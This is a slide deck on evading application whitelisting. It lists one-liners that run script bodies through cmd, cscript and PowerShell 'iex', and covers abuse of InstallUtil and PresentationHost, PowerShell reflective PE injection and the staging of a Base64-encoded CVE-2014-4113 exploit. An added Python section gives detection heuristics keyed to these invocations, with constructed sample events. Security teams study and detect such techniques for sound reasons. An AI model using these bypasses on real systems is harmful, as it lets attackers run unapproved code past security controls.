Simple Application Whitelisting Evasion Casey Smith @subTee
C:\>whoami
• Information Security Analyst – FirstBank , Colorado
• Internal Security Testing & Incident Response
Simple? – No Exploitation Necessary
Application Whitelisting – Quick
• Unknown/Unapproved Files Do Not Execute
• Policy keyed on: File Hash, Directory, Publisher
Agenda: Script, .NET, Native
Script Execution – Don’t Be Interesting
(The approved interpreter is what runs; the script body is read from a file whose extension is not a script type, so file-extension rules never see it.)
• .bat → cmd.exe /k < script.txt
• .vbs → cscript.exe //E:vbscript script.txt
• .ps1 → Get-Content script.txt | iex
DEMO #1
.NET Execution
Sponsors = Trusted Things That Execute Things
“An attacker, is more interested in what an application can be made to do and operates on the principle that any action not specifically denied, is allowed” –OWASP Secure Coding Practices Quick Reference Guide
InstallUtil.exe
• Let this hatch payload
• http://bit.ly/17iKrvf
• Confuse Dynamic/Static Analysis
How Execution Events Can Be “Missed”
• Loads Assembly with READ Permission
• Later Changes Permission to EXECUTE
• YOUR WHITELISTING APPLICATION CAN MISS THIS.
• Thanks to @Bit9 and [ Matt L. & Chris L. ]
• Gain Initial Access
• Browser Based Delivery
• Try as Alternate To Java Applet Payload
PresentationHost.exe
• XAML Browser Application (XBAP)
• PresentationHost.exe File | Url
Native Execution – Create Custom Memory Loaders
Malwaria – .NET Memory Native PE File Execution
• https://github.com/subTee/Malwaria
• Encrypt Native Payload → Unpack In Memory → Execute
PowerShell = Best Sponsor
• Invoke-ReflectivePEInjection
• Embed Native Image
• Executes in PowerShell.exe Process
• Staged Execution
Well Done PowerSploit Developers!
DEMO #3 – CVE-2014-4113
a.exe → Base64 → YS5leGU= → PowerShell
• Compile Exploit & Base64 Encode
• Embed in Script or Host on Server
• Invoke-ReflectivePEInjection.ps1
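The slides above name the sponsors a whitelisting policy tends to trust (cmd.exe, cscript.exe, powershell.exe, InstallUtil.exe, PresentationHost.exe) and the telltale way each is invoked. From the defender's side, the most useful thing to take away is what those invocations look like in process-creation telemetry. The following is an added example, not code from the talk or from the author: a small set of detection heuristics run over constructed process-creation events shaped like Sysmon Event ID 1 (image, command line, parent image). The rule names, the user-writable path list, the browser list and every sample event are assumptions made for the example.

```python
"""Detection heuristics for the script-host and "sponsor" techniques in the deck.

Added example (not from the slides). Event fields mirror Sysmon Event ID 1 /
EDR process-creation telemetry; all sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # raw command line as logged
    parent_image: str   # full path of the parent process


# Extensions an extension-based whitelist rule would normally inspect (assumption).
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1")
# Locations an ordinary user can write to (assumption; tune per estate).
USER_WRITABLE = re.compile(r"(\\users\\|\\temp\\|\\appdata\\|\\programdata\\)", re.I)
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _last_arg(cmd: str) -> str:
    """Last whitespace-separated token, quotes stripped (good enough for these rules)."""
    parts = cmd.strip().split()
    return parts[-1].strip('"') if parts else ""


def classify(ev: ProcessEvent) -> list[str]:
    """Return the names of every rule that fires for one event (empty list = clean)."""
    hits: list[str] = []
    img = _basename(ev.image)
    low = ev.command_line.lower()
    last = _last_arg(ev.command_line).lower()
    is_ps = img in ("powershell.exe", "pwsh.exe")

    # "Script Execution - Don't Be Interesting": interpreter fed a non-script extension.
    if img == "cmd.exe" and re.search(r"/[kc]\s*<", low) and not last.endswith(SCRIPT_EXT):
        hits.append("cmd_stdin_redirect_nonscript")
    if img in ("cscript.exe", "wscript.exe") and "//e:" in low and not last.endswith(SCRIPT_EXT):
        hits.append("wsh_engine_override_nonscript")
    if is_ps and re.search(r"get-content\b.*\|\s*(iex|invoke-expression)\b", low):
        hits.append("powershell_getcontent_iex")

    # "PowerShell = Best Sponsor": reflective PE load from an embedded/encoded image.
    if is_ps and ("invoke-reflectivepeinjection" in low or "frombase64string" in low):
        hits.append("powershell_reflective_pe_load")

    # "InstallUtil.exe": signed .NET utility handed an assembly from a user-writable path.
    if img == "installutil.exe" and USER_WRITABLE.search(last):
        hits.append("installutil_user_writable_assembly")

    # "PresentationHost.exe": XBAP host spawned by a browser (browser-based delivery).
    if img == "presentationhost.exe" and _basename(ev.parent_image) in BROWSERS:
        hits.append("presentationhost_browser_spawn")
    return hits


def scan(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Run every rule over a batch; return (command_line, rule_names) for flagged events only."""
    return [(ev.command_line, hits) for ev in events if (hits := classify(ev))]


# Constructed sample telemetry: five suspicious events and two benign ones.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /k < C:\Users\demo\script.txt", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\cscript.exe",
                 r"cscript.exe //E:vbscript C:\Users\demo\script.txt", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -c "Get-Content C:\Users\demo\script.txt | iex"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
                 r"InstallUtil.exe C:\Users\demo\AppData\Local\Temp\sample.dll",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\PresentationHost.exe",
                 'PresentationHost.exe "http://example.invalid/app.xbap"',
                 r"C:\Program Files\Internet Explorer\iexplore.exe"),
    ProcessEvent(r"C:\Windows\System32\cscript.exe",
                 r"cscript.exe //E:vbscript C:\scripts\inventory.vbs", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):40s} <- {cmd}")
```

The rules key on the shape of the invocation rather than on any particular script or binary name, which is the point the deck makes: the executable is already trusted, so the signal has to come from how it is being driven. Each rule is a heuristic and will need tuning against legitimate admin tooling before it is used for alerting.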
Other Tactics/Methods?
Living Off The Land – Not my idea… Brilliant.
• https://www.youtube.com/watch?v=j-r6UonEkUw
• Live In Memory
• Use Only What is Available and Consistent
• Using Pre-Existing/Trusted instead of New/Unapproved